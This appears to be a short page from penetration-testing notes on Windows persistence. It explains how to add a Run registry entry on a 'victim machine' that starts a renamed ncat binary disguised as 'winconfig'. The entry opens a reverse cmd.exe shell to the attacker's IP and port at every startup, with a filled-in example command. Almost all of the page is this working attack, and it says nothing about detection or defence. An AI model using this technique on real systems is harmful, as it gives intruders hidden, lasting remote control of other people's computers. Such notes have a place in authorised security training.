Create a Registry
Registries in the victim machine may be used to save a connection to the attacker machine.
Regedit
Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Right-Button > New > String value
We name it exactly like the ncat.exe file (if we renamed it to winconfig, then we call this registry winconfig>
We edit the registry and we add the path to the executable file and some commands in the Value data:
“C:\Windows/System32\winconfig.exe <attacker IP> <port> -e cmd.exe”
For instance: “C:\Windows/System32\winconfig.exe 192.168.1.50 5540 -e cmd.exe”
Python script that add a binary to the Registry
See Making your binary persistent
Last update: 2023-05-02 Created: February 2, 2023 19:36:50